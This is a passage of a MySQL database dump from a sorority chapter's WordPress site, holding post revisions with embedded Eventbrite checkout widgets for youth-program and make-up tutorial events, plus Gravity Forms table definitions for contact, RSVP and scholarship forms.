window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'110217495496\',\r\n        iframeContainerId: \'eventbrite-widget-container-110217495496\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>[/raw]\r\n','Youth Open House','','inherit','closed','closed','','1390-revision-v1','','','2020-07-08 11:15:20','2020-07-08 16:15:20','',1390,'https://zphiblgz.org/1390-revision-v1/',0,'revision','',0),(1456,1,'2021-09-22 13:23:24','2021-09-22 18:23:24','','2021 scholarship recipient 2','','inherit','closed','closed','','2021-scholarship-recipient-2','','','2021-09-22 13:23:24','2021-09-22 18:23:24','',0,'https://zphiblgz.org/wp-content/uploads/2021/09/2021-scholarship-recipient-2.png',0,'attachment','image/png',0),(1444,1,'2021-01-26 18:32:37','0000-00-00 00:00:00','<div id=\"eventbrite-widget-container-137353661499\"></div>\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'137353661499\',\r\n        iframeContainerId: \'eventbrite-widget-container-137353661499\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>','','','draft','closed','open','','','','','2021-01-26 18:32:37','2021-01-26 23:32:37','',0,'https://zphiblgz.org/?post_type=event&#038;p=1444',0,'event','',0),(1451,1,'2021-09-22 07:01:54','0000-00-00 00:00:00','','Auto Draft','','auto-draft','closed','open','','','','','2021-09-22 07:01:54','0000-00-00 00:00:00','',0,'https://zphiblgz.org/?p=1451',0,'post','',0),(1448,1,'2021-01-26 18:45:07','2021-01-26 23:45:07','We are currently accepting applications for our youth programs! The purpose of our Youth Programs are to help young ladies grow culturally, socially, and educationally while impacting their\r\ncommunities. We have programs for girls of all ages! Pearlettes (ages 4-8), Amicettes (ages 9-13), and Archonettes (ages 14-17).\r\n[raw]\r\n<div id=\"eventbrite-widget-container-110217495496\"></div>\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'110217495496\',\r\n        iframeContainerId: \'eventbrite-widget-container-110217495496\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>[/raw]\r\n\r\n<div id=\"eventbrite-widget-container-137353661499\"></div>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'137353661499\',\r\n        iframeContainerId: \'eventbrite-widget-container-137353661499\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>','Youth Open House','','inherit','closed','closed','','1390-autosave-v1','','','2021-01-26 18:45:07','2021-01-26 23:45:07','',1390,'https://zphiblgz.org/1390-autosave-v1/',0,'revision','',0),(1442,6,'2021-01-26 15:38:43','2021-01-26 20:38:43','Get GLAMMED up while staying masked up with Make-Up Artist Shantel Pinnock!\r\n[raw]\r\n<div style=\"width:195px; text-align:center;\" ><iframe  src=\"https://www.eventbrite.com/calendar-widget?eid=137353661499\" frameborder=\"0\" height=\"457\" width=\"195\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" allowtransparency=\"true\"></iframe><div style=\"font-family:Helvetica, Arial; font-size:12px; padding:10px 0 5px; margin:2px; width:195px; text-align:center;\" ><a class=\"powered-by-eb\" style=\"color: #ADB0B6; text-decoration: none;\" target=\"_blank\" href=\"http://www.eventbrite.com/\" rel=\"noopener\">Powered by Eventbrite</a></div></div>[/raw]','Above the Mask: Virtual Make-up Tutorial','','inherit','closed','closed','','1431-autosave-v1','','','2021-01-26 15:38:43','2021-01-26 20:38:43','',1431,'https://zphiblgz.org/1431-autosave-v1/',0,'revision','',0),(1445,1,'2021-01-26 18:32:37','2021-01-26 23:32:37','<div id=\"eventbrite-widget-container-137353661499\"></div>\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'137353661499\',\r\n        iframeContainerId: \'eventbrite-widget-container-137353661499\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>','','','inherit','closed','closed','','1444-revision-v1','','','2021-01-26 18:32:37','2021-01-26 23:32:37','',1444,'https://zphiblgz.org/1444-revision-v1/',0,'revision','',0),(1452,1,'2021-09-22 09:09:12','2021-09-22 14:09:12','','2020 Basileus LW left','','inherit','closed','closed','','2020-basileus-lw-left','','','2021-09-22 09:09:12','2021-09-22 14:09:12','',0,'https://zphiblgz.org/wp-content/uploads/2021/09/2020-Basileus-LW-left.jpeg',0,'attachment','image/jpeg',0);
/*!40000 ALTER TABLE `lwz_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_rg_form`
--

DROP TABLE IF EXISTS `lwz_rg_form`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_rg_form` (
  `id` mediumint(8) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(150) NOT NULL,
  `date_created` datetime NOT NULL,
  `is_active` tinyint(1) NOT NULL DEFAULT '1',
  `is_trash` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_rg_form`
--

LOCK TABLES `lwz_rg_form` WRITE;
/*!40000 ALTER TABLE `lwz_rg_form` DISABLE KEYS */;
INSERT INTO `lwz_rg_form` VALUES (1,'Contact Form','2013-10-04 01:27:14',0,0),(2,'Pretty and Polished RSVP','2014-02-11 01:34:56',0,1),(3,'W. Ruth Conway Scholarship Recommendation Form','2016-09-18 00:06:09',1,1),(4,'ZEN','2017-01-16 07:41:51',0,1),(5,'Youth Aux','2017-02-02 23:29:41',0,1),(6,'W. Ruth Conway Scholarship Application','2017-08-10 05:22:53',0,0),(7,'Youth Clubs','2017-09-13 11:58:54',1,0),(8,'W. Ruth Conway Scholarship Recommendation Form','2017-09-16 03:44:05',1,1),(9,'Denim & Pearls','2017-10-27 23:17:11',1,1),(10,'Membership Interest Form','2018-08-13 06:43:13',1,0);
/*!40000 ALTER TABLE `lwz_rg_form` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_rg_form_meta`
--

DROP TABLE IF EXISTS `lwz_rg_form_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_rg_form_meta` (
  `form_id` mediumint(8) unsigned NOT NULL,
  `display_meta` longtext,
  `entries_grid_meta` longtext,
  `confirmations` longtext,
  `notifications` longtext,
  PRIMARY KEY (`form_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_rg_form_meta`
--

LOCK TABLES `lwz_rg_form_meta` WRITE;
/*!40000 ALTER TABLE `lwz_rg_form_meta` DISABLE KEYS */;
INSERT INTO `lwz_rg_form_meta` VALUES (1,'{\"title\":\"Contact Form\",\"description\":\"\",\"labelPlacement\":\"top_label\",\"descriptionPlacement\":\"below\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\"},\"fields\":[{\"type\":\"name\",\"adminLabel\":\"\",\"allowsPrepopulate\":false,\"defaultValue\":\"\",\"description\":\"\",\"content\":\"\",\"cssClass\":\"\",\"errorMessage\":\"\",\"id\":1,\"inputName\":\"\",\"isRequired\":true,\"label\":\"Name\",\"noDuplicates\":\"\",\"size\":\"medium\",\"postCustomFieldName\":\"\",\"displayAllCategories\":false,\"displayCaption\":\"\",\"displayDescription\":\"\",\"displayTitle\":\"\",\"inputType\":\"\",\"rangeMin\":\"\",\"rangeMax\":\"\",\"calendarIconType\":\"\",\"calendarIconUrl\":\"\",\"dateType\":\"\",\"dateFormat\":\"\",\"phoneFormat\":\"\",\"addressType\":\"\",\"defaultCountry\":\"\",\"defaultProvince\":\"\",\"defaultState\":\"\",\"hideAddress2\":\"\",\"hideCountry\":\"\",\"hideState\":\"\",\"inputs\":[{\"id\":1.3,\"label\":\"First\",\"name\":\"\"},{\"id\":1.6,\"label\":\"Last\",\"name\":\"\"}],\"nameFormat\":\"\",\"allowedExtensions\":\"\",\"captchaType\":\"\",\"pageNumber\":1,\"captchaTheme\":\"\",\"simpleCaptchaSize\":\"\",\"simpleCaptchaFontColor\":\"\",\"simpleCaptchaBackgroundColor\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"enablePrice\":\"\",\"basePrice\":\"\",\"formId\":1,\"descriptionPlacement\":\"below\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"visibility\":\"visible\",\"displayOnly\":\"\"},{\"type\":\"email\",\"adminLabel\":\"\",\"allowsPrepopulate\":false,\"defaultValue\":\"\",\"description\":\"\",\"content\":\"\",\"cssClass\":\"\",\"errorMessage\":\"\",\"id\":2,\"inputName\":\"\",\"isRequired\":false,\"label\":\"Email\",\"noDuplicates\":\"\",\"size\":\"medium\",\"postCustomFieldName\":\"\",\"displayAllCategories\":false,\"displayCaption\":\"\",\"displayDescription\":\"\",\"displayTitle\":\"\",\"inputType\":\"\",\"rangeMin\":\"\",\"rangeMax\":\"\",\"calendarIconType\":\"\",\"calendarIconUrl\":\"\",\"dateType\":\"\",\"dateFormat\":\"\",\"phoneFormat\":\"\",\"addressType\":\"\",\"defaultCountry\":\"\",\"defaultProvince\":\"\",\"defaultState\":\"\",\"hideAddress2\":\"\",\"hideCountry\":\"\",\"hideState\":\"\",\"inputs\":null,\"nameFormat\":\"\",\"allowedExtensions\":\"\",\"captchaType\":\"\",\"pageNumber\":1,\"captchaTheme\":\"\",\"simpleCaptchaSize\":\"\",\"simpleCaptchaFontColor\":\"\",\"simpleCaptchaBackgroundColor\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"enablePrice\":\"\",\"basePrice\":\"\",\"formId\":1,\"descriptionPlacement\":\"below\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"visibility\":\"visible\",\"displayOnly\":\"\"},{\"type\":\"phone\",\"id\":6,\"label\":\"Phone Number\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"phoneFormat\":\"standard\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"allowsPrepopulate\":false,\"formId\":1,\"pageNumber\":1,\"choices\":\"\",\"conditionalLogic\":\"\",\"visibility\":\"visible\",\"displayOnly\":\"\"},{\"type\":\"select\",\"adminLabel\":\"\",\"allowsPrepopulate\":false,\"defaultValue\":\"\",\"description\":\"\",\"content\":\"\",\"cssClass\":\"\",\"errorMessage\":\"\",\"id\":5,\"inputName\":\"\",\"isRequired\":true,\"label\":\"Type of Inquiry\",\"noDuplicates\":\"\",\"size\":\"medium\",\"postCustomFieldName\":\"\",\"displayAllCategories\":false,\"displayCaption\":\"\",\"displayDescription\":\"\",\"displayTitle\":\"\",\"inputType\":\"\",\"rangeMin\":\"\",\"rangeMax\":\"\",\"calendarIconType\":\"\",\"calendarIconUrl\":\"\",\"dateType\":\"\",\"dateFormat\":\"\",\"phoneFormat\":\"\",\"addressType\":\"\",\"defaultCountry\":\"\",\"defaultProvince\":\"\",\"defaultState\":\"\",\"hideAddress2\":\"\",\"hideCountry\":\"\",\"hideState\":\"\",\"inputs\":null,\"nameFormat\":\"\",\"allowedExtensions\":\"\",\"captchaType\":\"\",\"pageNumber\":1,\"captchaTheme\":\"\",\"simpleCaptchaSize\":\"\",\"simpleCaptchaFontColor\":\"\",\"simpleCaptchaBackgroundColor\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"enablePrice\":\"\",\"basePrice\":\"\",\"choices\":[{\"text\":\"Seeking Membership\",\"value\":\"Seeking Membership\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Reclaim\",\"value\":\"Reclaim\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Transfer\",\"value\":\"Transfer\",\"isSelected\":false,\"price\":\"\"}],\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"formId\":1,\"descriptionPlacement\":\"below\",\"labelPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"conditionalLogic\":\"\",\"visibility\":\"visible\",\"displayOnly\":\"\",\"useRichTextEditor\":false},{\"type\":\"textarea\",\"adminLabel\":\"\",\"allowsPrepopulate\":false,\"defaultValue\":\"\",\"description\":\"\",\"content\":\"\",\"cssClass\":\"\",\"errorMessage\":\"\",\"id\":3,\"inputName\":\"\",\"isRequired\":false,\"label\":\"Message\",\"noDuplicates\":\"\",\"size\":\"medium\",\"postCustomFieldName\":\"\",\"displayAllCategories\":false,\"displayCaption\":\"\",\"displayDescription\":\"\",\"displayTitle\":\"\",\"inputType\":\"\",\"rangeMin\":\"\",\"rangeMax\":\"\",\"calendarIconType\":\"\",\"calendarIconUrl\":\"\",\"dateType\":\"\",\"dateFormat\":\"\",\"phoneFormat\":\"\",\"addressType\":\"\",\"defaultCountry\":\"\",\"defaultProvince\":\"\",\"defaultState\":\"\",\"hideAddress2\":\"\",\"hideCountry\":\"\",\"hideState\":\"\",\"inputs\":null,\"nameFormat\":\"\",\"allowedExtensions\":\"\",\"captchaType\":\"\",\"pageNumber\":1,\"captchaTheme\":\"\",\"simpleCaptchaSize\":\"\",\"simpleCaptchaFontColor\":\"\",\"simpleCaptchaBackgroundColor\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"enablePrice\":\"\",\"basePrice\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"formId\":1,\"descriptionPlacement\":\"below\",\"choices\":\"\",\"conditionalLogic\":\"\",\"visibility\":\"visible\",\"displayOnly\":\"\"}],\"id\":1,\"useCurrentUserAsAuthor\":true,\"postContentTemplateEnabled\":false,\"postTitleTemplateEnabled\":false,\"postTitleTemplate\":\"\",\"postContentTemplate\":\"\",\"lastPageButton\":null,\"pagination\":null,\"firstPageCssClass\":null}','','a:1:{s:13:\"524e1972512ed\";a:8:{s:2:\"id\";s:13:\"524e1972512ed\";s:4:\"name\";s:20:\"Default Confirmation\";s:9:\"isDefault\";b:1;s:4:\"type\";s:7:\"message\";s:7:\"message\";s:64:\"Thanks for contacting us! We will get in touch with you shortly.\";s:3:\"url\";s:0:\"\";s:6:\"pageId\";s:0:\"\";s:11:\"queryString\";s:0:\"\";}}','{\"524e19725023c\":{\"isActive\":false,\"id\":\"524e19725023c\",\"name\":\"Admin Notification\",\"event\":\"form_submission\",\"to\":\"{admin_email}\",\"toType\":\"email\",\"bcc\":\"\",\"subject\":\"New submission from {form_title}\",\"message\":\"{all_fields}\",\"from\":\"first-anti-basileus@zphiblgz.org\",\"fromName\":\"LGZ Contact Form\",\"replyTo\":\"\",\"routing\":null,\"conditionalLogic\":null,\"disableAutoformat\":\"\"},\"54289091cd525\":{\"isActive\":true,\"id\":\"54289091cd525\",\"name\":\"First Anti Notification\",\"event\":\"form_submission\",\"to\":\"first-anti-basileus@zphiblgz.org\",\"toType\":\"email\",\"bcc\":\"\",\"subject\":\"New submission from {form_title}\",\"message\":\"{all_fields}\",\"from\":\"first-anti-basileus@zphiblgz.org\",\"fromName\":\"LGZ Contact Form\",\"replyTo\":\"\",\"routing\":null,\"conditionalLogic\":null,\"disableAutoformat\":\"\"}}'),(2,'{\"title\":\"Pretty and Polished RSVP\",\"description\":\"Pretty and Polished RSVP\",\"labelPlacement\":\"top_label\",\"descriptionPlacement\":\"below\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\"},\"fields\":[{\"adminLabel\":\"\",\"adminOnly\":\"\",\"allowsPrepopulate\":false,\"defaultValue\":\"\",\"description\":\"\",\"content\":\"\",\"cssClass\":\"\",\"errorMessage\":\"\",\"id\":1,\"inputName\":\"\",\"isRequired\":true,\"label\":\"Name\",\"noDuplicates\":\"\",\"size\":\"medium\",\"type\":\"name\",\"postCustomFieldName\":\"\",\"displayAllCategories\":false,\"displayCaption\":\"\",\"displayDescription\":\"\",\"displayTitle\":\"\",\"inputType\":\"\",\"rangeMin\":\"\",\"rangeMax\":\"\",\"calendarIconType\":\"\",\"calendarIconUrl\":\"\",\"dateType\":\"\",\"dateFormat\":\"\",\"phoneFormat\":\"\",\"addressType\":\"\",\"defaultCountry\":\"\",\"defaultProvince\":\"\",\"defaultState\":\"\",\"hideAddress2\":\"\",\"hideCountry\":\"\",\"hideState\":\"\",\"inputs\":[{\"id\":1.3,\"label\":\"First\",\"name\":\"\"},{\"id\":1.6,\"label\":\"Last\",\"name\":\"\"}],\"nameFormat\":\"\",\"allowedExtensions\":\"\",\"captchaType\":\"\",\"pageNumber\":1,\"captchaTheme\":\"\",\"simpleCaptchaSize\":\"\",\"simpleCaptchaFontColor\":\"\",\"simpleCaptchaBackgroundColor\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"enablePrice\":\"\",\"basePrice\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"formId\":2,\"descriptionPlacement\":\"below\"},{\"adminLabel\":\"\",\"adminOnly\":\"\",\"allowsPrepopulate\":false,\"defaultValue\":\"\",\"description\":\"\",\"content\":\"\",\"cssClass\":\"\",\"errorMessage\":\"\",\"id\":2,\"inputName\":\"\",\"isRequired\":false,\"label\":\"Email\",\"noDuplicates\":\"\",\"size\":\"medium\",\"type\":\"email\",\"postCustomFieldName\":\"\",\"displayAllCategories\":false,\"displayCaption\":\"\",\"displayDescription\":\"\",\"displayTitle\":\"\",\"inputType\":\"\",\"rangeMin\":\"\",\"rangeMax\":\"\",\"calendarIconType\":\"\",\"calendarIconUrl\":\"\",\"dateType\":\"\",\"dateFormat\":\"\",\"phoneFormat\":\"\",\"addressType\":\"\",\"defaultCountry\":\"\",\"defaultProvince\":\"\",\"defaultState\":\"\",\"hideAddress2\":\"\",\"hideCountry\":\"\",\"hideState\":\"\",\"inputs\":null,\"nameFormat\":\"\",\"allowedExtensions\":\"\",\"captchaType\":\"\",\"pageNumber\":1,\"captchaTheme\":\"\",\"simpleCaptchaSize\":\"\",\"simpleCaptchaFontColor\":\"\",\"simpleCaptchaBackgroundColor\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"enablePrice\":\"\",\"basePrice\":\"\",\"formId\":2,\"descriptionPlacement\":\"below\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"conditionalLogic\":\"\"},{\"adminLabel\":\"\",\"adminOnly\":\"\",\"allowsPrepopulate\":false,\"defaultValue\":\"\",\"description\":\"\",\"content\":\"\",\"cssClass\":\"\",\"errorMessage\":\"\",\"id\":3,\"inputName\":\"\",\"isRequired\":false,\"label\":\"Phone\",\"noDuplicates\":\"\",\"size\":\"medium\",\"type\":\"phone\",\"postCustomFieldName\":\"\",\"displayAllCategories\":false,\"displayCaption\":\"\",\"displayDescription\":\"\",\"displayTitle\":\"\",\"inputType\":\"\",\"rangeMin\":\"\",\"rangeMax\":\"\",\"calendarIconType\":\"\",\"calendarIconUrl\":\"\",\"dateType\":\"\",\"dateFormat\":\"\",\"phoneFormat\":\"standard\",\"addressType\":\"\",\"defaultCountry\":\"\",\"defaultProvince\":\"\",\"defaultState\":\"\",\"hideAddress2\":\"\",\"hideCountry\":\"\",\"hideState\":\"\",\"inputs\":null,\"nameFormat\":\"\",\"allowedExtensions\":\"\",\"captchaType\":\"\",\"pageNumber\":1,\"captchaTheme\":\"\",\"simpleCaptchaSize\":\"\",\"simpleCaptchaFontColor\":\"\",\"simpleCaptchaBackgroundColor\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"enablePrice\":\"\",\"basePrice\":\"\",\"formId\":2,\"descriptionPlacement\":\"below\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"inputMask\":false,\"inputMaskValue\":\"\"},{\"adminLabel\":\"\",\"adminOnly\":\"\",\"allowsPrepopulate\":false,\"defaultValue\":\"\",\"description\":\"\",\"content\":\"\",\"cssClass\":\"\",\"errorMessage\":\"\",\"id\":4,\"inputName\":\"\",\"isRequired\":true,\"label\":\"High School\",\"noDuplicates\":\"\",\"size\":\"medium\",\"type\":\"text\",\"postCustomFieldName\":\"\",\"displayAllCategories\":false,\"displayCaption\":\"\",\"displayDescription\":\"\",\"displayTitle\":\"\",\"inputType\":\"\",\"rangeMin\":\"\",\"rangeMax\":\"\",\"calendarIconType\":\"\",\"calendarIconUrl\":\"\",\"dateType\":\"\",\"dateFormat\":\"\",\"phoneFormat\":\"\",\"addressType\":\"\",\"defaultCountry\":\"\",\"defaultProvince\":\"\",\"defaultState\":\"\",\"hideAddress2\":\"\",\"hideCountry\":\"\",\"hideState\":\"\",\"inputs\":null,\"nameFormat\":\"\",\"allowedExtensions\":\"\",\"captchaType\":\"\",\"pageNumber\":1,\"captchaTheme\":\"\",\"simpleCaptchaSize\":\"\",\"simpleCaptchaFontColor\":\"\",\"simpleCaptchaBackgroundColor\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"enablePrice\":\"\",\"basePrice\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"formId\":2,\"descriptionPlacement\":\"below\"},{\"adminLabel\":\"\",\"adminOnly\":\"\",\"allowsPrepopulate\":false,\"defaultValue\":\"\",\"description\":\"\",\"content\":\"\",\"cssClass\":\"\",\"errorMessage\":\"\",\"id\":5,\"inputName\":\"\",\"isRequired\":true,\"label\":\"Grade\",\"noDuplicates\":\"\",\"size\":\"medium\",\"type\":\"select\",\"postCustomFieldName\":\"\",\"displayAllCategories\":false,\"displayCaption\":\"\",\"displayDescription\":\"\",\"displayTitle\":\"\",\"inputType\":\"\",\"rangeMin\":\"\",\"rangeMax\":\"\",\"calendarIconType\":\"\",\"calendarIconUrl\":\"\",\"dateType\":\"\",\"dateFormat\":\"\",\"phoneFormat\":\"\",\"addressType\":\"\",\"defaultCountry\":\"\",\"defaultProvince\":\"\",\"defaultState\":\"\",\"hideAddress2\":\"\",\"hideCountry\":\"\",\"hideState\":\"\",\"inputs\":null,\"nameFormat\":\"\",\"allowedExtensions\":\"\",\"captchaType\":\"\",\"pageNumber\":1,\"captchaTheme\":\"\",\"simpleCaptchaSize\":\"\",\"simpleCaptchaFontColor\":\"\",\"simpleCaptchaBackgroundColor\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"enablePrice\":\"\",\"basePrice\":\"\",\"choices\":[{\"text\":\"11\",\"value\":\"11\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"12\",\"value\":\"12\",\"isSelected\":false,\"price\":\"\"}],\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"formId\":2,\"descriptionPlacement\":\"below\"},{\"adminLabel\":\"\",\"adminOnly\":\"\",\"allowsPrepopulate\":false,\"defaultValue\":\"\",\"description\":\"\",\"content\":\"\",\"cssClass\":\"\",\"errorMessage\":\"\",\"id\":6,\"inputName\":\"\",\"isRequired\":false,\"label\":\"Girl\'s Dress Size\",\"noDuplicates\":\"\",\"size\":\"medium\",\"type\":\"select\",\"postCustomFieldName\":\"\",\"displayAllCategories\":false,\"displayCaption\":\"\",\"displayDescription\":\"\",\"displayTitle\":\"\",\"inputType\":\"\",\"rangeMin\":\"\",\"rangeMax\":\"\",\"calendarIconType\":\"\",\"calendarIconUrl\":\"\",\"dateType\":\"\",\"dateFormat\":\"\",\"phoneFormat\":\"\",\"addressType\":\"\",\"defaultCountry\":\"\",\"defaultProvince\":\"\",\"defaultState\":\"\",\"hideAddress2\":\"\",\"hideCountry\":\"\",\"hideState\":\"\",\"inputs\":null,\"nameFormat\":\"\",\"allowedExtensions\":\"\",\"captchaType\":\"\",\"pageNumber\":1,\"captchaTheme\":\"\",\"simpleCaptchaSize\":\"\",\"simpleCaptchaFontColor\":\"\",\"simpleCaptchaBackgroundColor\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"enablePrice\":\"\",\"basePrice\":\"\",\"choices\":[{\"text\":\"N\\/A\",\"value\":\"N\\/A\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"0\",\"value\":\"0\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"2\",\"value\":\"2\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"4\",\"value\":\"4\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"6\",\"value\":\"6\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"8\",\"value\":\"8\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"10\",\"value\":\"10\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"12\",\"value\":\"12\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"14\",\"value\":\"14\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"16\",\"value\":\"16\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"18\",\"value\":\"18\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"20\",\"value\":\"20\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"22\",\"value\":\"22\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"24\",\"value\":\"24\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"26\",\"value\":\"26\",\"isSelected\":false,\"price\":\"\"}],\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"formId\":2,\"descriptionPlacement\":\"below\"},{\"adminLabel\":\"\",\"adminOnly\":\"\",\"allowsPrepopulate\":false,\"defaultValue\":\"\",\"description\":\"\",\"content\":\"\",\"cssClass\":\"\",\"errorMessage\":\"\",\"id\":7,\"inputName\":\"\",\"isRequired\":false,\"label\":\"Gentlemen\'s 